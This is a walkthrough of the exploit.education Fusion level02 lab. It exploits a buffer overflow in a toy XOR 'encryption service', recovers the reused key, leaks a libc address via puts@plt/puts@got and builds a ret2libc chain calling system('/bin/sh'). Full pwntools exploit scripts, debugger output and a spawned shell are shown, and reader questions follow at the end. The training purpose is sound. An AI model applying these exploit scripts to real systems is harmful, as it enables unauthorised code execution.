This level deals with some basic obfuscation / math stuff.
This level introduces non-executable memory and return into libc / .text / return orientated programming (ROP).
The description and source code can be found here:
http://exploit.education/fusion/level02/
Source Code Analysis
For this level, I looked at the source code and came up with a plan of attack before even launching the Fusion VM. Let’s step through it. I won’t bother with main() as its only relevant purpose is to call the encrypt_file() function. That function may look kinda long, but it’s actually pretty simple.
void encrypt_file()
{
  // http://thedailywtf.com/Articles/Extensible-XML.aspx
  // maybe make bigger for inevitable xml-in-xml-in-xml ?
  unsigned char buffer[32 * 4096];

  unsigned char op;
  size_t sz;
  int loop;

  printf("[-- Enterprise configuration file encryption service --]\n");

  loop = 1;
  while(loop) {
    nread(0, &op, sizeof(op));
    switch(op) {
      case 'E':
        nread(0, &sz, sizeof(sz));
        nread(0, buffer, sz);
        cipher(buffer, sz);
        printf("[-- encryption complete. please mention "
               "474bd3ad-c65b-47ab-b041-602047ab8792 to support "
               "staff to retrieve your file --]\n");
        nwrite(1, &sz, sizeof(sz));
        nwrite(1, buffer, sz);
        break;
      case 'Q':
        loop = 0;
        break;
      default:
        exit(EXIT_FAILURE);
    }
  }
}
I’m not sure why those comments at the start of the function are there; they don’t seem to be very relevant. Anyway, a few things are happening:
- Several variables are declared (buffer, op, sz, and loop).
- A greeting message is printed.
- A while loop begins, checking the “loop” variable (it only loops while that is not 0).
- User input is accepted for the “op” (operation) variable.
- If that input was “E” then:
  - Accept user input for the “sz” variable. This sets the number of bytes to read for the data to be encrypted.
  - Accept user input for the “buffer” variable. This will be the data we want encrypted.
  - Call the cipher() function.
  - Print a message when the encryption is complete.
  - Write the size to stdout.
  - Write the encrypted data to stdout.
- If “Q” was entered, set “loop” to 0 so the loop ends and the function returns normally. Anything else calls exit() immediately.
You may have noticed the vulnerability here. The user can specify the maximum size of the input. Even though 131,072 bytes (32 * 4096) are allocated to the “buffer” variable, nothing checks “sz” against that, so the user can simply specify a larger number.
The cipher() function is a bit more complex, even though it’s not a proper encryption algorithm.
void cipher(unsigned char *blah, size_t len)
{
  static int keyed;
  static unsigned int keybuf[XORSZ];

  int blocks;
  unsigned int *blahi, j;

  if(keyed == 0) {
    int fd;
    fd = open("/dev/urandom", O_RDONLY);
    if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE);
    close(fd);
    keyed = 1;
  }

  blahi = (unsigned int *)(blah);
  blocks = (len / 4);
  if(len & 3) blocks += 1;

  for(j = 0; j < blocks; j++) {
    blahi[j] ^= keybuf[j % XORSZ];
  }
}
- Variables are declared (keyed, keybuf, blocks, blahi, j) alongside the parameters blah and len.
- If the “keyed” variable is equal to 0 (no key has been generated yet), then do the following:
  - Open the “/dev/urandom” file.
  - Read sizeof(keybuf) bytes from “/dev/urandom” into the “keybuf” variable. With XORSZ being 32, that is 32 unsigned ints of 4 bytes each, or 128 bytes.
  - Set the “keyed” variable to 1.
- Set “blahi” (an unsigned int pointer) to point to “blah” (the data to encrypt).
- Set the “blocks” variable to be the user-supplied length (“len” variable) divided by 4.
- If the “len” variable is not divisible by 4, then add 1 to the “blocks” variable.
- A for loop that performs the encryption, 4 bytes at a time (keybuf & blahi are unsigned ints).
- This encryption “algorithm” will simply XOR the data with whatever is in “keybuf”, wrapping around to the start of the key every XORSZ blocks.
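To convince myself of what the loop does, here is a rough Python model of cipher(). It is only a sketch: XORSZ = 32 is an assumption that matches the 128-byte key used in the scripts later on, os.urandom() stands in for /dev/urandom, and the truncation at the end mimics the fact that only “sz” bytes are written back.

```python
import os
import struct

XORSZ = 32  # assumed number of 32-bit words in the key (128 bytes total)


def cipher(data, keybuf):
    """Model of cipher(): XOR each 32-bit word with keybuf[j % XORSZ]."""
    # The C code rounds up to whole 4-byte blocks, so pad to a multiple of 4.
    padded = data + b"\x00" * (-len(data) % 4)
    words = struct.unpack(f"<{len(padded) // 4}I", padded)
    out = [w ^ keybuf[j % XORSZ] for j, w in enumerate(words)]
    # Only the first len(data) bytes are sent back to the client.
    return struct.pack(f"<{len(out)}I", *out)[: len(data)]


# Stand-in for the bytes the service reads from /dev/urandom.
keybuf = list(struct.unpack(f"<{XORSZ}I", os.urandom(XORSZ * 4)))

message = b"Lorem ipsum dolor sit amet, consectetur adipiscing elit."
once = cipher(message, keybuf)
twice = cipher(once, keybuf)
print(twice == message)  # XOR with the same key undoes itself
```

Because XOR is its own inverse, running data through the same key twice gives the original back, which is the property the rest of this attack leans on.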
While there is the obvious buffer overflow vulnerability, the problem is that whatever data you send will be XOR’ed with a random key. After looking at the source code for a while, I did spot one more mistake. If the cipher() function is called multiple times during a connection, the “keybuf” variable will be the same each time. Both “keyed” and “keybuf” are declared static, so they keep their values between calls: the key is generated on the first call and reused after that. So, I should be able to send data, take the encrypted form, XOR the two together and get the key. Then, I can overwrite the saved EIP value with an “encrypted” address so that when the encryption happens on it, the desired “unencrypted” address will be left.
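The key-recovery idea can be tried offline before touching the VM. This is a minimal sketch, not the real service: service() is a hypothetical stand-in for the remote “E” operation, and the 128-byte key length is an assumption taken from sizeof(keybuf).

```python
import os

KEY_LEN = 128  # assumed sizeof(keybuf): 32 unsigned ints * 4 bytes


def xor_repeat(data, key):
    """XOR data with key, repeating the key as often as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


secret_key = os.urandom(KEY_LEN)  # unknown to the attacker


def service(data):
    """Hypothetical stand-in for the remote 'E' operation."""
    return xor_repeat(data, secret_key)


# Step 1: send known plaintext; ciphertext XOR plaintext gives the key.
known = b"A" * KEY_LEN
recovered = xor_repeat(service(known), known)

# Step 2: pre-"encrypt" the bytes we want to end up in memory.
target = b"\xde\xad\xbe\xef" * 4
pre_encrypted = xor_repeat(target, recovered)

# Step 3: the service XORs again and leaves the desired bytes behind.
print(service(pre_encrypted) == target)
```

Working byte by byte gives the same result as the 4-byte blocks in the C code, since XOR never carries between bytes.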
Interacting With The Program
The next step is to figure out how the program was intended to be used. This was a bit harder than I expected, and I couldn’t get it to work by simply using netcat and manually entering the expected input. One reason for this is that the “sz” (size) variable it’s expecting is a 4-byte integer. If I typed “58” as input, the program would receive the ASCII bytes “\x35\x38” rather than the number 58. What I need to send is “\x3a\x00\x00\x00” (58 as a little-endian 4-byte integer). That, coupled with figuring out where it wanted a newline character, made this a tedious task of trial and error. I suppose it wouldn’t have taken so long if I understood the C language a bit better, but such is life. Anyway, here’s a script I came up with to interact with the program in its intended fashion:
#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)

data = "Lorem ipsum dolor sit amet, consectetur adipiscing elit."

print(io.recvline().decode())
io.send("E")
io.send((len(data)).to_bytes(4, "little"))
io.send(data)
print(io.recvline().decode())

size = int.from_bytes(io.recv(4), 'little')

encrypted = b""
while len(encrypted) < size:
    encrypted += io.recv(size)

log.info(f"Size = {size}")
log.info("Encrypted message:")
print(encrypted)
print()

io.close()
andrew ~/fusion/level02 $ ./level02_test.py
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[*] Size = 56
[*] Encrypted message:
b"\x8b\xc7\x86\xfe.\x17\xb0\xd1\x04\xdb&\x10%n\xa6Bg_`\xce\xa7\x14\x9c \xce\x82\x93\x14\xef\xc7.M\xa3\xd7{d'\xef\xb7\xa2\x0e\xce\xa3\xb5\x90\xd4\xf5.j\x15[\x9d\nH\x18z"
[*] Closed connection to fusion port 20002
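The size-field problem I ran into with netcat is easy to see in isolation. This sketch assumes size_t is 4 bytes on this 32-bit target; the trailing "\nA" in the misread example is just made-up filler for whatever bytes would follow on the wire.

```python
import struct

length = 58

as_text = str(length).encode()       # what typing "58" into netcat sends
as_word = struct.pack("<I", length)  # what nread(0, &sz, sizeof(sz)) expects

print(as_text)  # b'58'
print(as_word)  # b':\x00\x00\x00'

# If the ASCII digits are read as the size, the program also swallows the
# next two bytes and ends up with a huge number instead of 58.
(misread,) = struct.unpack("<I", as_text + b"\nA")
print(hex(misread))  # 0x410a3835
```

The to_bytes(4, "little") call in my script does the same job as struct.pack("<I", ...) here.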
Now that I’ve got that working, I’ll start building out the attack. I’ll use a “ret2libc” technique to bypass both ASLR and NX protections.
Cheating
I like to build my exploits (or any script I write) and test them incrementally so that if something goes wrong, I’ll have a better idea of what the problem was. First, I’ll write the exploit pretending that ASLR is not enabled. I plan to create a ROP chain that calls system() with a “/bin/sh” string passed to it. Normally, with ASLR enabled, the address of system() would be randomized (along with everything else in libc) and you’d have no way of knowing it when attacking a remote machine. In this case, I know that the parent process for “level02” is not restarted each time a connection is made & closed. This means that I can attach to the process with GDB, print the address of system(), and use that in my ROP chain knowing that it won’t change (until I restart the VM or the parent process).
Getting the address of system():
fusion@fusion ~ $ ps aux | grep level02
20002 1201 0.0 0.0 1816 52 ? Ss 05:44 0:00 /opt/fusion/bin/level02
fusion 1463 0.0 0.0 4184 796 pts/0 S+ 05:45 0:00 grep --color=auto level02
fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion:
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xb767fb20 <__libc_system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb76759e0 <__GI_exit>
(gdb) find 0xb767fb20, +9999999, "/bin/sh"
0xb777b8da
warning: Unable to access target memory at 0xb77bdf62, halting search.
1 pattern found.
I also grabbed the address of exit() so the program will cleanly exit when I close the shell. It’s not necessary here, but why not create good habits? I also did a search for a “/bin/sh” string starting at the address of system(). This will also be randomized but I can just hard-code it into my script for now.
Here’s the “cheat” exploit:
#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)
    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), 'little')
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)
    return encrypted


io = remote("fusion", 20002)

print(io.recvline().decode())
data = "A" * 128
encrypted = encrypt(data)
key = bytes(a ^ b for a, b in zip(data.encode(), encrypted))

payload = b"A" * 131088
payload += p32(0xb767fb20)  # Address of system()
payload += p32(0xb76759e0)  # Address of exit()
payload += p32(0xb777b8da)  # Address of "/bin/sh"

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)
io.send("Q")

io.interactive()
At this point, I shouldn’t have to explain how to find the offset of the saved return address (the 131088 number). You can see that I have the 3 addresses in my ROP chain. The address for exit() comes after system() so that when system() hits ret, it’ll pop the address for exit() into EIP and cleanly exit the program. The address for the “/bin/sh” string is last because system() will look to ESP+4 for an argument.
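To make the stack layout concrete, here is a small sketch that builds the same three-word chain with the standard library instead of pwntools (struct.pack("<I", ...) does what p32() does) and labels each slot. The addresses are the ones from my GDB session above and will differ on another boot.

```python
import struct

BUF_SIZE = 32 * 4096  # sizeof(buffer) in encrypt_file()
RET_OFFSET = 131088   # padding before the saved return address

SYSTEM = 0xb767fb20   # from "p system" in GDB
EXIT = 0xb76759e0     # from "p exit" in GDB
BINSH = 0xb777b8da    # from the "find" command in GDB

chain = struct.pack("<III", SYSTEM, EXIT, BINSH)
payload = b"A" * RET_OFFSET + chain

# Bytes sitting between the end of the buffer and the saved return address.
print(RET_OFFSET - BUF_SIZE)  # 16

slots = (
    (0, "saved EIP, overwritten with system()"),
    (4, "return address seen by system(), set to exit()"),
    (8, "first argument to system(), pointer to /bin/sh"),
)
for offset, meaning in slots:
    (value,) = struct.unpack_from("<I", chain, offset)
    print(f"+{offset}: {value:#010x}  {meaning}")
```

The middle slot is what system() treats as its own return address, which is why exit() goes there and the argument comes one word later.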
Testing it out:
andrew ~/fusion/level02 $ ./level02_system.py
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002
Leaking Libc Address
The next step is to figure out how to get the base address of libc. I used this blog post by @D4mianWayne to get a better understanding of ret2libc attacks and leaking the libc address:
https://d4mianwayne.github.io/posts/ret2libc-pwntools
That post explains, exactly, what I’ll need to do for this challenge with the only difference being the architecture. That post uses an x64 binary so function arguments are passed in registers instead of the stack.
The idea here is to overwrite the saved return address on the stack with the address of puts@plt while passing a single argument to that “call,” the address of puts@got. After you send that payload, you’ll receive some raw bytes, the first four of which should be the address of puts(). You can use that to calculate the base address of libc. Looking at the symbols in libc, you can find the offset to puts() and subtract that from the actual address that was leaked. This gives you libc’s base address, from which you can calculate the actual address of any other function. Just find the offset and add that to the base address.
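The arithmetic is simple enough to sketch without a live target. The leaked value and the puts() offset below are the ones that show up further down in this post; the bytes after the first four are made-up filler, since puts() keeps printing until it hits a NUL byte and then adds a newline.

```python
import struct

PUTS_OFFSET = 0x603b0  # offset of puts() inside this libc (from readelf)

# Simulated output of puts(puts@got): the GOT entry for puts(), some
# filler standing in for whatever follows it, then the trailing newline.
raw = struct.pack("<I", 0xb76583b0) + b"\x86\x89\x04\x08" + b"\n"

# Only the first four bytes matter: the little-endian address of puts().
(leak,) = struct.unpack("<I", raw[:4])
libc_base = leak - PUTS_OFFSET

print(hex(leak))       # 0xb76583b0
print(hex(libc_base))  # 0xb75f8000

# Shared libraries are mapped on page boundaries, so a base that is not
# a multiple of 0x1000 suggests a wrong offset or a bad leak.
print(libc_base % 0x1000 == 0)
```

Checking that the base is page-aligned is a cheap sanity test I like to run before trusting a leak.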
First, I’ll get the PLT and GOT addresses for puts() in the level02 binary:
fusion@fusion ~ $ objdump -d /opt/fusion/bin/level02 | grep -A1 puts
08048930 <puts@plt>:
 8048930: ff 25 b8 b3 04 08 jmp *0x804b3b8
...
This shows that the PLT address is 0x8048930 and GOT address is 0x804b3b8.
Now I’ll need to find the puts() offset within libc. To determine which libc binary is being used by this process, I can attach to it with GDB again:
fusion@fusion ~ $ sudo gdb -q -p 1201
[sudo] password for fusion:
warning: not using untrusted file "/home/fusion/.gdbinit"
Attaching to process 1201
Reading symbols from /opt/fusion/bin/level02...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77cb424 in __kernel_vsyscall ()
(gdb) info sharedlibrary
From        To          Syms Read   Shared Object Library
0xb7659be0  0xb7766784  Yes         /lib/i386-linux-gnu/libc.so.6
0xb77cc830  0xb77e35cf  Yes (*)     /lib/ld-linux.so.2
(*): Shared library is missing debugging information.
While I’m here, I’m going to get the actual puts() address so I can verify my results later on:
(gdb) p puts
$1 = {<text variable, no debug info>} 0xb76a33b0 <_IO_puts>
To get the offset of puts(), I can use readelf to list the symbols in libc and grep for “puts”:
fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " puts@"
423: 000603b0 444 FUNC WEAK DEFAULT 12 puts@@GLIBC_2.0
Now I need to modify my Python script to capture the address:
#!/usr/bin/env python3

from pwn import *

io = remote("fusion", 20002)


def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)
    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), 'little')
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)
    return encrypted


print(io.recvline().decode())
data = "A" * 128
encrypted = encrypt(data)
sample = data[:128].encode()
key = bytes(a ^ b for a, b in zip(sample, encrypted))

payload = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)
io.send("Q")

puts_offset = 0x603b0
leak = u32(io.recv(4))
libc_base = leak - puts_offset

log.info(f"Leaked puts() address: {hex(leak)}")
log.info(f"Libc puts() offset: {hex(puts_offset)}")
log.info(f"Libc base address: {hex(libc_base)}")
print()

io.close()
Let’s run it:
andrew ~/fusion/level02 $ ./level02_puts.py
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[*] Leaked puts() address: 0xb76583b0
[*] Libc puts() offset: 0x603b0
[*] Libc base address: 0xb75f8000
[*] Closed connection to fusion port 20002
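That leaked address (0xb76583b0) is the same as the one GDB reported on the Fusion VM at the time. (The GDB output shown above, 0xb76a33b0, looks like it was captured before the service was restarted, so only the low 12 bits, 0x3b0, line up with this run.)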
Side Note
What if I didn’t have access to the libc binary and didn’t know what version it was? Each version is bound to have different offsets from its base address. Well, after leaking the address of puts(), you could use a tool, like libc-database, to get the version of libc. For example, take the leaked puts() address (0xb76583b0) and do a search based on the last three hex digits:
andrew ~/libc-database (master) $ ./find puts 3b0
archive-old-eglibc (id libc6_2.13-20ubuntu5_i386)
archive-old-glibc (id libc6_2.5-0ubuntu14_amd64)
archive-old-glibc (id libc6-amd64_2.5-0ubuntu14_i386)
Since I got multiple results, I could either leak another address and add it to the search, or just use trial and error in my exploit. However, I happen to know that the actual libc version used here is that first result.
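The reason the last three hex digits are enough to search on is that libc is loaded at a page-aligned address, so ASLR never touches the low 12 bits. A quick sketch with the two puts() addresses that appear in this post:

```python
PAGE_MASK = 0xfff       # low 12 bits, i.e. the last three hex digits
puts_offset = 0x603b0   # from readelf on the VM's libc

# puts() addresses from the GDB session and from the leak script.
leaks = [0xb76a33b0, 0xb76583b0]

for leak in leaks:
    # Adding a page-aligned base cannot change the low 12 bits.
    print(hex(leak & PAGE_MASK), (leak & PAGE_MASK) == (puts_offset & PAGE_MASK))
```

Both addresses end in 0x3b0 even though the upper bits differ, which is exactly the fingerprint libc-database matches against.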
Exploitation
I need a few more offset addresses to build this exploit. I’ll need the offset of exit() (to cleanly exit the program when the shell closes) and system():
fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | egrep " system| exit"
135: 000329e0 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
1409: 0003cb20 139 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
And I’ll need the string “/bin/sh” to be somewhere in memory. I could generate a ROP chain to do this for me by using strcpy() to put certain bytes into a writable section (such as .bss). However, I know that the string I need is already in libc so I can find the offset to it using strings:
fusion@fusion ~ $ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
1388da /bin/sh
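Before wiring these offsets into the exploit, they can be cross-checked against the absolute addresses from the earlier GDB session. This is just a sanity check using numbers already shown in this post: if the offsets are right, one base address should explain every GDB value.

```python
# Offsets from readelf / strings on the VM's libc.
SYSTEM_OFFSET = 0x3cb20
EXIT_OFFSET = 0x329e0
PUTS_OFFSET = 0x603b0
BINSH_OFFSET = 0x1388da

# Absolute addresses from the GDB sessions earlier in this post.
gdb_system = 0xb767fb20
gdb_exit = 0xb76759e0
gdb_puts = 0xb76a33b0
gdb_binsh = 0xb777b8da

# Derive the base from one symbol, then check the others against it.
libc_base = gdb_system - SYSTEM_OFFSET
print(hex(libc_base))  # 0xb7643000

print(libc_base + EXIT_OFFSET == gdb_exit)
print(libc_base + PUTS_OFFSET == gdb_puts)
print(libc_base + BINSH_OFFSET == gdb_binsh)
```

All three comparisons hold, so the same offsets can be added to whatever base the leak produces on a fresh run.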
Final exploit script:
#!/usr/bin/env python3

from pwn import *


def encrypt(data):
    io.send("E")
    io.send((len(data)).to_bytes(4, "little"))
    io.send(data)
    print(io.recvline().decode())
    size = int.from_bytes(io.recv(4), "little")
    encrypted = b""
    while len(encrypted) < size:
        encrypted += io.recv(size)
    return encrypted


def get_key():
    print(io.recvline().decode())
    data = "A" * 128
    encrypted = encrypt(data)
    sample = data.encode()
    return bytes(a ^ b for a, b in zip(sample, encrypted))


io = remote("fusion", 20002)
key = get_key()

payload = b"A" * 131088
payload += p32(0x08048930)  # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8)  # Address of puts@got

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)
io.send("Q")

puts_offset = 0x603b0
leak = u32(io.recv(4))
libc_base = leak - puts_offset

io.close()

# Now to get shell
io = remote("fusion", 20002)
key = get_key()

system_offset = 0x3cb20
exit_offset = 0x329e0
binsh_offset = 0x1388da

payload = b"A" * 131088
payload += p32(libc_base + system_offset)
payload += p32(libc_base + exit_offset)
payload += p32(libc_base + binsh_offset)

enc_data = b""
for i in range(0, len(payload), len(key)):
    enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key))

encrypt(enc_data)
io.send("Q")

io.interactive()
Testing it out:
andrew ~/fusion/level02 $ ./level02.py
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[*] Closed connection to fusion port 20002
[+] Opening connection to fusion on port 20002: Done
[-- Enterprise configuration file encryption service --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --]
[*] Switching to interactive mode
$ id
uid=20002 gid=20002 groups=20002
The buffer overflow here is a bit different because of ASLR: to find where the program crashes, you need to search manually, adding 4 bytes each time, instead of using a fixed-length payload with distinct characters (“AAAABBBBCCCC”).
Correct me if I missed something.
payload = b"A" * 131088
payload += p32(0x08048930) # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8) # Address of puts@got
I didn’t understand why the “AAAA” is here (as an argument for puts@plt?).
Also, what’s the role of puts@got here? How does it connect and get used after puts@plt?
Mystery solved: we use “A” * 4 because the argument sits 4 bytes past the return address, so the puts@got address ends up as the argument for puts@plt. The “AAAA” just fills the slot where puts() expects its own return address.
payload = b"A" * 131088
payload += p32(0x08048930) # Address of puts@plt
payload += b"AAAA"
payload += p32(0x0804b3b8) # Address of puts@got
Why do we need exit()? Is the shell created by using exit()?
Because, as I understand it, in your solution it is used for a clean exit:
“exit() (to cleanly exit the program when the shell closes)”
Also, why is ‘Q’ used? Can’t the shell be invoked inside the loop?
(I tried and it doesn’t work.) But why? The exploit takes place inside the loop.
The ‘Q’ lets us leave the loop so that encrypt_file() returns instead of calling exit(), and that return is what loads our new EIP.
The effect of exit() can be seen in syslog by running the following command:
cat /var/log/syslog
The buffer overflow will still appear there, but after closing the shell no further lines are added.